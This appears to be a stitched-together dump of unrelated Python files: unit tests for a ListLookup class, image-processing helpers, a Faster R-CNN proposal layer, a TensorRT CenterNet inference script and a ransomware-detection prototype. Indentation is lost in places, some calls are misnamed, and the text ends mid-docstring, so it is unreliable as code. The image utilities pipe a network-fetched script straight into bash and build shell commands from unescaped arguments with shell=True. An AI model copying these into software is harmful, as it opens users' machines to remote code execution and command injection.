    assert result[0]['country'] == 'uk'
    assert result[0]['name'] == 'Bermingham'
def test_unique_index_multiple():
    # unique=True combined with multiple=True: each derived key (id and id*10)
    # maps to exactly one record.
    cities = ListLookup(sample_list)
    cities.index("id", lambda d: [d['id'], d['id'] * 10], unique=True, multiple=True)
    assert list(cities.lookup(id=1, preserve_order=True)) == [
        {"id": 1, "country": "us", "name": "Atlanta"}
    ]
    assert list(cities.lookup(id=10, preserve_order=True)) == [
        {"id": 1, "country": "us", "name": "Atlanta"}
    ]
    # id=2 must not collide with record 1 despite the derived 10x keys.
    assert list(cities.lookup(id=2, preserve_order=True))[0]['id'] != 1
def test_lookup_terminated():
    # A key with no entries ("xx") short-circuits the lookup to empty even
    # though the other criterion (id=2) matches a record.
    cities = ListLookup(sample_list)
    cities.index("id", lambda d: d['id'])
    cities.index("country", lambda d: d['country'])
    result = list(cities.lookup(id=2, country="xx"))
    assert len(result) == 0
def test_lookup_nothing_found():
    # Lookups for absent keys return empty, both for a single criterion and
    # for a combination where each key exists but their intersection is empty.
    cities = ListLookup(sample_list)
    cities.index("id", lambda d: d['id'])
    cities.index("country", lambda d: d['country'])
    cities.index("name", lambda d: d['name'])
    result = list(cities.lookup(country="xx"))
    assert len(result) == 0
    result = list(cities.lookup(country='us', name='DC'))
    assert len(result) == 0
def test_lookup_does_not_modify_indexes():
    """
    Regression test: a lookup must not mutate the indexes, so a second,
    different lookup on the same instance still succeeds.
    (There was a bug that modified an index after lookup.)
    """
    cities = ListLookup(sample_list)
    cities.index("country", lambda d: d['country'])
    cities.index("name", lambda d: d['name'])
    result = list(cities.lookup(country='us', name='Miami'))
    assert len(result) == 1
    second_res = list(cities.lookup(country='us', name='Atlanta'))
    assert len(second_res) == 1
def test_validation():
cities = ListLookup(sample_list)
cities.index("country", lambda d: d['country'])
with pytest.raises(ValueError):
cities.index("country", lambda d: d['name'])
with pytest.raises(ValueError):
cities.index("preserve_order", lambda d: d['name'])
with pytest.raises(ValueError):
list(cities.lookup(dummy_index='us')) | 4,149 | 1,446 |
import time
import numpy as np
import os, sys, shutil
from contextlib import contextmanager
from numba import cuda as ncuda
import PIL
from PIL import Image, ImageFilter, ImageDraw, ImageFont
import cv2
import contextlib
from copy import deepcopy
import subprocess
from glob import glob
from os import path as osp
from os import path
utilspath = os.path.join(os.getcwd(), 'utils/')
@contextmanager
def timing(description: str) -> None:
start = time.time()
yield
elapsed_time = time.time() - start
print( description + ': finished in ' + f"{elapsed_time:.4f}" + ' s' )
class Quiet:
def __init__(self):
#Store initial stdout in this variable
self._stdout = sys.stdout
def __del__(self):
sys.stdout = self._stdout
@contextmanager
def suppress_stdout(self, raising = False):
with open(os.devnull, "w") as devnull:
error_raised = False
error = "there was an error"
sys.stdout = devnull
try:
yield
except Exception as e:
error_raised = True
error = e
sys.stdout = self._stdout
print(e)
finally:
finished = True
sys.stdout = self._stdout
sys.stdout = self._stdout
if error_raised:
if raising:
raise(error)
else:
print(error)
#Mute stdout inside this context
@contextmanager
def quiet_and_timeit(self, description = "Process running", raising = False, quiet = True):
print(description+"...", end = '')
start = time.time()
try:
if quiet:
#with suppress_stdout(raising):
sys.stdout = open(os.devnull, "w")
yield
if quiet:
sys.stdout = self._stdout
except Exception as e:
if quiet:
sys.stdout = self._stdout
if raising:
sys.stdout = self._stdout
raise(e)
else:
sys.stdout = self._stdout
print(e)
elapsed_time = time.time() - start
sys.stdout = self._stdout
print(': finished in ' + f"{elapsed_time:.4f}" + ' s' )
#Force printing in stdout, regardless of the context (such as the one defined above)
def force_print(self, value):
prev_stdout = sys.stdout
sys.stdout = self._stdout
print(value)
sys.stdout = prev_stdout
def duplicatedir(src,dst):
if not os.path.exists(src):
print('ImagePipeline_utils. duplicatedir: Source directory does not exists!')
return
if src != dst:
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src=src,dst=dst)
def createdir_ifnotexists(directory):
#create directory, recursively if needed, and do nothing if directory already exists
os.makedirs(directory, exist_ok=True)
def initdir(directory):
if os.path.exists(directory):
shutil.rmtree(directory)
os.makedirs(directory)
def to_RGB(image):
return image.convert('RGB')
def to_grayscale(image):
return image.convert('L')
def split_RGB_images(input_dir):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = to_RGB(im)
#split channels
r, g, b = Image.Image.split(im)
r = to_RGB(r)
g = to_RGB(g)
b = to_RGB(b)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
r.save(f+"_red.png")
g.save(f+"_green.png")
b.save(f+"_blue.png")
except Exception as e:
print(e)
def unsplit_RGB_images(input_dir):
imname = '*_red.png'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
substring = orig[:-8]
r = to_grayscale(Image.open(substring+'_red.png'))
g = to_grayscale(Image.open(substring+'_green.png'))
b = to_grayscale(Image.open(substring+'_blue.png'))
im = Image.merge('RGB', (r,g,b) )
#save as png (and remove monochannel images)
os.remove(substring+'_red.png')
os.remove(substring+'_green.png')
os.remove(substring+'_blue.png')
im.save(substring+".png")
except Exception as e:
print(e)
def preprocess(input_dir, gray = True, resize = True, size = (1000,1000)):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = to_RGB(im)
#convert to grayscale
if gray:
im = to_grayscale(im)
#resize
if resize:
width, height = im.size
#resize only if larger than limit
if width > size[0] or height > size[1]:
im.thumbnail(size,Image.ANTIALIAS)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def filtering(input_dir, median = True, median_winsize = 5, mean = True, mean_winsize = 5):
with timing("Filtering (median) with PIL (consider using filtering_opencv for faster processing)"):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#median blur
if median:
im = im.filter(ImageFilter.MedianFilter(median_winsize))
#mean blur
if mean:
im = im.filter(ImageFilter.Meanfilter(mean_winsize))
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def filtering_opencv(input_dir, median = True, median_winsize = 5, gaussian = True, gaussian_x = 5, gaussian_y = 5, gaussian_std = 0, mean = True, mean_winsize = 3):
with timing("Filtering (median) with opencv"):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
print(orig)
try:
im = cv2.imread(orig, cv2.IMREAD_COLOR)
#median blur
if median:
im = cv2.medianBlur(im,median_winsize)
if gaussian:
im = cv2.GaussianBlur(im,(gaussian_x,gaussian_y),gaussian_std)
#mean blur
if mean:
im = cv2.blur(im,(mean_winsize,mean_winsize))
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
cv2.imwrite(f+".png", im)
except Exception as e:
print(e)
def rotate_images(input_dir):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = im.transpose(Image.ROTATE_90)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def unrotate_images(input_dir):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = im.transpose(Image.ROTATE_270)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def reset_gpu(device = 0):
ncuda.select_device(device)
ncuda.close()
import os, time, datetime
#import PIL.Image as Image
import numpy as np
from skimage.measure import compare_psnr, compare_ssim
from skimage.io import imread, imsave
def to_tensor(img):
if img.ndim == 2:
return img[np.newaxis,...,np.newaxis]
elif img.ndim == 3:
return np.moveaxis(img,2,0)[...,np.newaxis]
def from_tensor(img):
return np.squeeze(np.moveaxis(img[...,0],0,-1))
def save_result(result,path):
path = path if path.find('.') != -1 else path+'.png'
ext = os.path.splitext(path)[-1]
if ext in ('.txt','.dlm'):
np.savetxt(path,result,fmt='%2.4f')
else:
imsave(path,np.clip(result,0,1))
fontfile = os.path.join(utilspath,"arial.ttf")
def addnoise(im, sigma = 10, imagetype = 'L', add_label = False):
x = np.array(im)
y = x + np.random.normal(0, sigma, x.shape)
y=np.clip(y, 0, 255)
im = PIL.Image.fromarray(y.astype('uint8'), imagetype)
if add_label:
d = ImageDraw.Draw(im)
fnt = ImageFont.truetype(fontfile, 40)
if imagetype == 'L':
fill = 240
elif imagetype == 'RGB':
fill = (255, 0, 0)
elif imagetype == 'RGBA':
fill = (255,0,0,0)
d.text((10,10), "sigma = %s" % sigma, font = fnt, fill = fill)
return im
utilspath = os.path.join(os.getcwd(), 'utils/')
fontfile = os.path.join(utilspath,"arial.ttf")
def concat_images(img_list, labels = [], imagetype = None, sameheight = True, imagewidth = None, imageheight = None, labelsize = 30, labelpos = (10,10), labelcolor = None):
"""
imagetype: allow to convert all images to a PIL.Image.mode (L = grayscale, RGB, RGBA, ...)
sameheight: put all images to same height (size of smallest image of the list, or imageheight if not None)
imageheight: if not None, force all images to have this height (keep aspect ratio). Force sameheight to True
imagewidth: if not None, force all images to have this width (keep aspect ratio if sameheight=False and imageheight=None)
"""
images = deepcopy(img_list)
if imagetype == None:
imagetype = 'RGB'
images = [im.convert(imagetype) for im in images]
#force all image to imageheight (keep aspect ratio)
if imageheight is not None:
sameheight = True
widths, heights = zip(*(i.size for i in images))
#resize needed ?
if ( (len(set(heights)) > 1) & sameheight ) or (imageheight is not None) or (imagewidth is not None):
if imageheight is None:
imageheight = min(heights)
#force all images to same width
if imagewidth is not None:
if sameheight: #force width and height
images = [im.resize( (int(imagewidth),int(imageheight)),PIL.Image.ANTIALIAS ) for im in images]
else: #force width (keep aspect ratio)
images = [im.resize( (int(imagewidth),int(im.height*imagewidth/im.width)),PIL.Image.ANTIALIAS ) for im in images]
else: #force height (keep aspect ratio)
images = [im.resize( (int(im.width*imageheight/im.height), imageheight) ,PIL.Image.ANTIALIAS) for im in images]
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_height = max(heights)
new_im = PIL.Image.new(imagetype, (total_width, max_height))
#add labels to images
if len(labels) == len(images):
fnt = ImageFont.truetype(fontfile, labelsize)
if imagetype == 'L':
fill = 240
elif imagetype == 'RGB':
fill = (176,196,222)
elif imagetype == 'RGBA':
fill = (176,196,222,0)
if labelcolor is not None:
fill = labelcolor
for i in range(len(labels)):
d = ImageDraw.Draw(images[i]).text(labelpos, labels[i], font = fnt, fill = fill)
x_offset = 0
for im in images:
new_im.paste(im, (x_offset,0))
x_offset += im.size[0]
return new_im
def display_images(im_list, labels = [], **kwargs):
display(concat_images(im_list, labels, **kwargs))
def get_filepaths(directory):
files = [os.path.join(directory, file) for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file))]
return files
def get_filenames(directory):
files = [file for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file))]
return files
def display_folder(directory, limit = 10, **kwargs):
files = get_filepaths(directory)
files.sort()
if len(files) > limit:
files = files[:limit]
display_images([PIL.Image.open(f) for f in files], [os.path.split(f)[1] for f in files], **kwargs)
def compare_folders(dirs, labels = [], **kwargs):
if type(dirs) is list:
#dirs is a list of folders containings processed images to compare
dirlist = dirs
elif type(dirs) is str:
#dirs if parent folder of subfolders containings processed images to compare
dirlist = glob(os.path.join(dirs,'*'))
dirlist = [d for d in dirlist if os.path.isdir(d)]
first_dir = dirlist[0]
names = get_filenames(first_dir)
names.sort()
for n in names:
paths = [glob(os.path.join(d,osp.splitext(n)[0]+'*'))[0] for d in dirlist]
display_images([PIL.Image.open(p) for p in paths], [os.path.split(d)[1] for d in dirlist], **kwargs)
def clone_git(url, dir_name = None, tag = None, reclone = False):
"""
url: url of the git repository to clone
dir_name: name of the folder to give to the repository. If not given, the git repository name is used
tag: allows to checkout a specific commit if given
reclone: overwrite existing repo
"""
old_dir = os.getcwd()
if dir_name is None:
dir_name = os.path.split(url)[1] #use git repo name
dir_name = os.path.splitext(dir_name)[0] #remove ".git" if present
if reclone and os.path.exists(dir_name):
shutil.rmtree(dir_name)
if not os.path.exists(dir_name):
command = "git clone %s %s" % (url, dir_name)
subprocess.run(command, shell = True)
os.chdir(dir_name)
if tag is not None:
command = "git checkout %s" % tag
subprocess.run(command, shell = True)
git_path = os.path.join(os.getcwd())
os.chdir(old_dir)
return git_path
def download_gdrive(file_id):
subprocess.run("wget https://raw.githubusercontent.com/GitHub30/gdrive.sh/master/gdrive.sh", shell = True)
subprocess.run("curl gdrive.sh | bash -s %s" % file_id, shell = True)
subprocess.run("rm gdrive.sh", shell = True)
def image_average(imlist, weights):
assert len(imlist)==len(weights), "Input lists should have same size."
weights = np.array(weights)
weights = weights/np.sum(weights)
# Assuming all images are the same size, get dimensions of first image
w,h=Image.open(imlist[0]).convert("RGB").size
N=len(imlist)
# Create a numpy array of floats to store the average (assume RGB images)
arr=np.zeros((h,w,3),np.float)
# Build up average pixel intensities, casting each image as an array of floats
for im in imlist:
imarr=np.array(Image.open(im),dtype=np.float)
arr=arr+imarr/N
# Round values in array and cast as 8-bit integer
arr=np.array(np.round(arr),dtype=np.uint8)
# Generate, save and preview final image
out=Image.fromarray(arr,mode="RGB")
return out
| 13,697 | 5,675 |
#coding=utf-8
#测试os.walk()递归遍历所有的子目录和子文件
import os
all_files = []
path = os.getcwd()
list_files = os.walk(path)
for dirpath,dirnames,filenames in list_files:
for dir in dirnames:
all_files.append(os.path.join(dirpath,dir))
for file in filenames:
all_files.append(os.path.join(dirpath,file))
#打印所有的子目录和子文件
for file in all_files:
print(file) | 371 | 172 |
# --------------------------------------------------------
# Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from model.config import cfg
from model.bbox_transform import bbox_transform_inv, clip_boxes
from model.nms_wrapper import nms
def proposal_layer(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride,
anchors):
"""A simplified version compared to fast/er RCNN
For details please see the technical report
"""
if type(cfg_key) == bytes:
cfg_key = cfg_key.decode('utf-8')
pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N
post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N
nms_thresh = cfg[cfg_key].RPN_NMS_THRESH
# Get the scores and bounding boxes
scores = rpn_cls_prob[:, :, :, cfg.NBR_ANCHORS:]
rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))
scores = scores.reshape((-1, 1))
proposals = bbox_transform_inv(anchors, rpn_bbox_pred)
proposals = clip_boxes(proposals, im_info[:2])
# Pick the top region proposals
order = scores.ravel().argsort()[::-1]
if pre_nms_topN > 0:
order = order[:pre_nms_topN]
proposals = proposals[order, :]
scores = scores[order]
# Non-maximal suppression
keep = nms(np.hstack((proposals, scores)), nms_thresh)
# Pick th top region proposals after NMS
if post_nms_topN > 0:
keep = keep[:post_nms_topN]
proposals = proposals[keep, :]
scores = scores[keep]
# Only support single image as input
batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)
blob = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))
return blob, scores
def proposal_layer_all(rpn_bbox_pred, im_info, anchors):
"""
Simply returns every single RoI; GRP-HAI later decides
which are forwarded to the class-specific module.
"""
# Get the bounding boxes
batch_sz, height, width = rpn_bbox_pred.shape[0: 3]
rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))
proposals = bbox_transform_inv(anchors, rpn_bbox_pred)
proposals = clip_boxes(proposals, im_info[:2])
# Create initial (all-zeros) observation RoI volume
roi_obs_vol = np.zeros((batch_sz, height, width, cfg.NBR_ANCHORS),
dtype=np.int32)
not_keep_ids = np.zeros((1, 1), dtype=np.int32)
# Only support single image as input
batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)
rois_all = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))
return rois_all, roi_obs_vol, not_keep_ids | 2,801 | 1,020 |
from __future__ import print_function
import os
import time
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
import cv2
import mmcv
from tqdm import tqdm
import pickle as pkl
from vis_util import show_corners
from tools.model_zoo import model_zoo as zoo
TRT_LOGGER = trt.Logger()
# Simple helper data class that's a little nicer to use than a 2-tuple.
class HostDeviceMem(object):
def __init__(self, host_mem, device_mem):
self.host = host_mem
self.device = device_mem
def __str__(self):
return "Host:\n" + str(self.host) + "\nDevice:\n" + str(self.device)
def __repr__(self):
return self.__str__()
# Allocates all buffers required for an engine, i.e. host/device inputs/outputs.
def allocate_buffers(engine):
inputs = []
outputs = []
output_names = []
bindings = []
stream = cuda.Stream()
for binding in engine:
size = trt.volume(
engine.get_binding_shape(binding)) * engine.max_batch_size
dtype = trt.nptype(engine.get_binding_dtype(binding))
print('binding:{}, size:{}, dtype:{}'.format(binding, size, dtype))
# Allocate host and device buffers
host_mem = cuda.pagelocked_empty(size, dtype)
device_mem = cuda.mem_alloc(host_mem.nbytes)
# Append the device buffer to device bindings.
bindings.append(int(device_mem))
# Append to the appropriate list.
if engine.binding_is_input(binding):
inputs.append(HostDeviceMem(host_mem, device_mem))
else:
outputs.append(HostDeviceMem(host_mem, device_mem))
output_names.append(binding)
return inputs, outputs, output_names, bindings, stream
# This function is generalized for multiple inputs/outputs.
# inputs and outputs are expected to be lists of HostDeviceMem objects.
def do_inference(context, bindings, inputs, outputs, stream, batch_size=1):
# Transfer input data to the GPU.
[cuda.memcpy_htod_async(inp.device, inp.host, stream) for inp in inputs]
# Run inference.
context.execute_async(
batch_size=batch_size, bindings=bindings, stream_handle=stream.handle)
# Transfer predictions back from the GPU.
[cuda.memcpy_dtoh_async(out.host, out.device, stream) for out in outputs]
# Synchronize the stream
stream.synchronize()
# Return only the host outputs.
return [out.host for out in outputs]
def get_engine(onnx_file_path, engine_file_path=""):
"""Attempts to load a serialized engine if available, otherwise builds a new TensorRT engine and saves it."""
def build_engine(builder):
"""Takes an ONNX file and creates a TensorRT engine to run inference with"""
with builder.create_network() as network, trt.OnnxParser(
network, TRT_LOGGER) as parser:
builder.max_workspace_size = 1 << 27 # 1GB
builder.max_batch_size = 1
print('max workspace size: {:.2f} MB'.format(
builder.max_workspace_size / 1024 / 1024))
tic = time.time()
# Parse model file
if not os.path.exists(onnx_file_path):
print('ONNX file {} not found, please generate it.'.format(
onnx_file_path))
exit(0)
print('Loading ONNX file from path {}...'.format(onnx_file_path))
with open(onnx_file_path, 'rb') as model:
print('Beginning ONNX file parsing')
parser.parse(model.read())
print('Completed parsing of ONNX file')
print('Building an engine from file {}; this may take a while...'.
format(onnx_file_path))
engine = builder.build_cuda_engine(network)
if engine is None:
raise Exception('build engine failed')
else:
print('Completed! time cost: {:.1f}s'.format(time.time() -
tic))
with open(engine_file_path, "wb") as f:
f.write(engine.serialize())
return engine
with trt.Builder(TRT_LOGGER) as builder:
if builder.platform_has_fast_fp16:
print('enable fp16 mode!')
builder.fp16_mode = True
builder.strict_type_constraints = True
engine_file_path = engine_file_path.replace('.trt', '_fp16.trt')
if os.path.exists(engine_file_path):
# If a serialized engine exists, use it instead of building an engine.
print("Reading engine from file {}".format(engine_file_path))
with open(engine_file_path,
"rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
return runtime.deserialize_cuda_engine(f.read())
else:
return build_engine(builder)
def preprocess(image, use_rgb=True):
image = image.astype(np.float32)
mean_rgb = np.array([123.675, 116.28, 103.53])
std_rgb = np.array([58.395, 57.12, 57.375])
if use_rgb:
image = image[..., [2, 1, 0]]
image -= mean_rgb
image /= std_rgb
else:
mean_bgr = mean_rgb[[2, 1, 0]]
std_bgr = std_rgb[[2, 1, 0]]
image -= mean_bgr
image /= std_bgr
image = np.transpose(image, [2, 0, 1])
return np.ascontiguousarray(image)
def postprocess_2d(wh_feats, reg_offsets, heatmaps, heatmap_indexs, rf):
score_thresh = 0.01
h, w = heatmaps.shape[-2:]
batch, topk = heatmap_indexs.shape
heatmaps = heatmaps.reshape((batch, -1))
scores = np.take(heatmaps, heatmap_indexs)
labels = (heatmap_indexs // (h * w)).astype(int)
spatial_idx = heatmap_indexs % (h * w)
offsetx = np.take(reg_offsets[:, 0, ...].reshape((batch, -1)), spatial_idx)
offsety = np.take(reg_offsets[:, 1, ...].reshape((batch, -1)), spatial_idx)
pred_w = np.take(wh_feats[:, 0, ...].reshape((batch, -1)), spatial_idx)
pred_h = np.take(wh_feats[:, 1, ...].reshape((batch, -1)), spatial_idx)
cx = spatial_idx % w + offsetx
cy = spatial_idx // w + offsety
x1 = cx - pred_w / 2
y1 = cy - pred_h / 2
x2 = cx + pred_w / 2
y2 = cy + pred_h / 2
bboxes = np.stack([x1, y1, x2, y2], axis=2) * pool_scale
return bboxes, labels, scores
def show_results_2d(img, outputs, output_image_path, class_names):
# Run the post-processing algorithms on the TensorRT outputs and get the bounding box details of detected objects
bboxes, labels, scores = postprocess_2d(*outputs)
scores = scores[..., np.newaxis]
bboxes = np.concatenate((bboxes, scores), axis=2)
mmcv.imshow_det_bboxes(
img,
bboxes[0],
labels[0],
class_names=class_names,
score_thr=0.35,
show=output_image_path is None,
out_file=output_image_path)
# Draw the bounding boxes onto the original input image and save it as a PNG file
# obj_detected_img = draw_bboxes(resized_image, boxes[0], scores[0], classes[0])
#
# cv2.imwrite(output_image_path, obj_detected_img)
# print('Saved image with bounding boxes of detected objects to {}.'.format(
# output_image_path))
def postprocess_3d(heatmaps, height_feats, reg_xoffsets, reg_yoffsets, poses,
heatmap_indexs):
batch, _, h, w = heatmaps.shape
results = []
for i in range(batch):
idxs = heatmap_indexs[i]
scores = heatmaps[i].reshape(-1)[idxs]
labels = (idxs // (h * w)).astype(int)
idxs = idxs % (h * w)
x_idxs = idxs % w
y_idxs = idxs // w
offsetx = reg_xoffsets[i, :, y_idxs, x_idxs]
offsety = reg_yoffsets[i, :, y_idxs, x_idxs]
height = height_feats[i, :, y_idxs, x_idxs]
poses = poses[i, y_idxs, x_idxs]
cx = x_idxs[:, np.newaxis] + offsetx
cy = y_idxs[:, np.newaxis] + offsety
cy1 = cy - height / 2
cy2 = cy + height / 2
corners = np.stack([np.hstack([cx, cx]), np.hstack([cy1, cy2])])
corners = np.transpose(corners, [1, 2, 0]) * pool_scale
pose_scores = np.zeros_like(poses)
results.append([corners, labels, scores, poses, pose_scores])
return results
def show_results_3d(img, outputs, output_image_path, class_names):
height_feats, reg_xoffsets, reg_yoffsets, poses, heatmaps, heatmap_indexs, _ = outputs
results = postprocess_3d(heatmaps, height_feats, reg_xoffsets,
reg_yoffsets, poses, heatmap_indexs)
score_thresh = 0.35
with open('/private/ningqingqun/undistort.pkl', 'wb') as f:
pkl.dump(results[0][0][0], f)
show_corners(
img,
results[0],
class_names,
score_thr=score_thresh,
out_file=output_image_path,
pad=0)
def get_images2():
im_list = [
'/private/ningqingqun/datasets/undist_img.png'
# '/private/ningqingqun/datasets/outsource/201910110946_00000187_1570758388348.jpg'
]
return im_list
def get_images():
# input_image_path = '/private/ningqingqun/bags/truck1_2019_07_24_14_54_43_26.msg/front_right/201907241454/201907241454_00000000_1563951283641.jpg'
# input_image_path = '/private/ningqingqun/bags/truck2_2019_07_26_17_02_47_1.msg/front_right/201907261702/201907261702_00000002_1564131768223.jpg'
# input_image_path = '/private/ningqingqun/bags/truck1_2019_09_06_13_48_14_19.msg/front_right/201909061348/201909061348_00000005_1567748895027.jpg'
# data_dir = '/private/ningqingqun/bags/crane/howo1_2019_12_04_09_14_54_0.msg/front_left/201912040915'
# data_dir = '/private/ningqingqun/bags/howo1_2019_12_11_08_59_10_6.msg/head_right/201912110859'
# data_dir = '/private/ningqingqun/bags/jinlv4_2019_10_18_09_18_50_6.msg/head_right/201910180919'
data_dir = '/private/ningqingqun/bags/howo1_2019_12_24_17_49_48_2.msg/front_left/201912241750'
# data_dir = '//private/ningqingqun/datasets/outsource/mine/truck2/front_right/20191220'
im_list = [
os.path.join(data_dir, f) for f in os.listdir(data_dir)
if f.endswith('.jpg')
]
return im_list
# Output shapes expected by the post-processor
version = 'v5.5.2'
if 'cm' in version:
num_fg = 12
else:
num_fg = 7
topk = 50
input_h, input_w = (800, 1280)
out_channels = 64
pool_scale = 4
output_h = int(input_h / pool_scale)
output_w = int(input_w / pool_scale)
onnx_files = {
'v4_fp16':
'/private/ningqingqun/torch/centernet/r34_fp16_epoch_16_iter_60000.onnx',
'v5.1.16':
'/private/ningqingqun/mmdet/outputs/v5.1.16/centernet_r18_ignore_1017_1915_gpu12/epoch_35_iter_3675.onnx',
'v5.tmp':
'work_dirs/debug/centernet_r18_ignore_1105_1118_desktop/epoch_1_iter_500.onnx',
'cm-v0.1':
'work_dirs/debug/centernet_r18_no_1119_1954_desktop/epoch_35_iter_4305.onnx',
'cm-v0.2':
'work_dirs/debug/centernet_r18_no_1120_1157_desktop/epoch_40_iter_4920.onnx',
'cm-v0.6':
'/private/ningqingqun/mmdet/outputs/no31_36/centernet_r18_adam_no_crop_1129_1920_gpu9/epoch_10_iter_2000.onnx',
'cm-v0.8':
'/work/work_dirs/v5.3.3/centernet_r18_finetune_large_1207_1707_desktop/epoch_20_iter_1160.onnx'
}
name2shape = {
'heatmap': (1, num_fg, output_h, output_w),
'height_feats': (1, 3, output_h, output_w),
'reg_xoffset': (1, 3, output_h, output_w),
'reg_yoffset': (1, 3, output_h, output_w),
'pose': (1, output_h, output_w),
'raw_features': (1, output_h, output_w, out_channels),
'heatmap_indexs': (1, topk),
'wh_feats': (1, 2, output_h, output_w),
'reg_offset': (1, 2, output_h, output_w),
}
def main():
"""Create a TensorRT engine for ONNX-based centernet and run inference."""
try:
cuda.init()
major, minor = cuda.Device(0).compute_capability()
except:
raise Exception("failed to get gpu compute capability")
onnx_file_path = zoo[version]['model_file'].replace('.pth', '.onnx')
new_ext = '-{}.{}.trt'.format(major, minor)
engine_file_path = onnx_file_path.replace('.onnx', new_ext)
# engine_file_path ='/private/ningqingqun/torch/centernet/vision_detector_fabu_v4.0.0-5.1.5.0-6.1.trt'
# Download a dog image and save it to the following file path:
image_list = get_images()
out_dir = '/private/ningqingqun/results/trt_results/' + version + '_20191220_mining'
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
# Do inference with TensorRT
trt_outputs = []
with get_engine(onnx_file_path, engine_file_path
) as engine, engine.create_execution_context() as context:
inputs, outputs, output_names, bindings, stream = allocate_buffers(
engine)
# Do inference
# print('Running inference on image {}...'.format(input_image_path))
# Set host input to the image.
# The common.do_inference function will copy the input to the GPU
# before executing.
for input_image_path in tqdm(image_list):
# input_h, input_w = (input_h // 32 * 32, input_w // 32 * 32)
im = cv2.imread(input_image_path)
resized_image = cv2.resize(im, (input_w, input_h))
input_image = preprocess(resized_image)
inputs[0].host = input_image
# tic = time.time()
trt_outputs = do_inference(
context,
bindings=bindings,
inputs=inputs,
outputs=outputs,
stream=stream)
# print('inference time cost: {:.1f}ms'.format(
# (time.time() - tic) * 1000))
# Before doing post-processing, we need to reshape the outputs as the common.do_inference will give us flat arrays.
trt_outputs = [
output.reshape(name2shape[name])
for output, name in zip(trt_outputs, output_names)
]
class_names = [
'car', 'bus', 'truck', 'person', 'bicycle', 'tricycle', 'block'
]
out_file = os.path.join(out_dir,
os.path.basename(input_image_path))
if 'v5' in version:
show_results_3d(resized_image.copy(), trt_outputs, out_file,
class_names)
elif 'cm' in version:
class_names = [
'right20',
'right40',
'right45',
'left20',
'left40',
'left45',
'NO31',
'NO32',
'NO33',
'NO34',
'NO35',
'NO36',
]
show_results_2d(resized_image.copy(), trt_outputs, out_file,
class_names)
else:
show_results_2d(resized_image.copy(), trt_outputs, out_file,
class_names)
if __name__ == '__main__':
main()
| 14,999 | 5,562 |
import os, time, sys, hashlib
# Python Recreation of MonitorSauraus Rex.
# Originally Developed by Luke Barlow, Dayan Patel, Rob Shire, Sian Skiggs.
# Aims:
# - Detect Rapid File Changes
# - Cut Wifi Connections
# - Create Logs for running processes at time of trigger, find source infection file.
# - Create "Nest" Safe folder , with encryption and new file types. ".egg" type?
# - Create Notification for a user/admin? Connect to a database?
# - kill running processes in aim to kill attack.
# Getting MD5 Hash of a string:
# print (hashlib.md5("Your String".encode('utf-8')).hexdigest())
origHashList = []
# Getting MD5 Hash of a file:
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
# Shows Correct Hash Changes Upon File Alteration.
def getOrigMd5():
fileMd5 = md5("/home/barlowl3/test/test.txt")
origHashList.append(fileMd5)
time.sleep(3) # For Testing
fileMd5 = md5("/home/barlowl3/test/test.txt")
origHashList.append(fileMd5)
updateOrigHashText(origHashList)
# Prints The Collected Hashes.
def updateOrigHashText(origList):
ohl = open("/home/barlowl3/test/test.txt", "a")
for hash in origList:
ohl.write(hash)
ohl.write('\n')
ohl.close
# Main Method
def main():
getOrigMd5()
main()
#Use checksumdir python package available for calculating checksum/hash of directory. It's available at https://pypi.python.org/pypi/checksumdir/1.0.5
#Usage :
#import checksumdir
#hash = checksumdir.dirhash("c:\\temp")
#print hash
| 1,741 | 640 |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .data_source import DataSchema, DataSchemaConfig, DataSource
from .tsv import TSVDataSource
__all__ = ["DataSchema", "DataSchemaConfig", "DataSource", "TSVDataSource"]
| 270 | 80 |
import math
class Solution(object):
    """Minimal-step puzzle solver (LeetCode LCP 13 style).

    The maze is a list of equal-length strings: 'S' start, 'T' target,
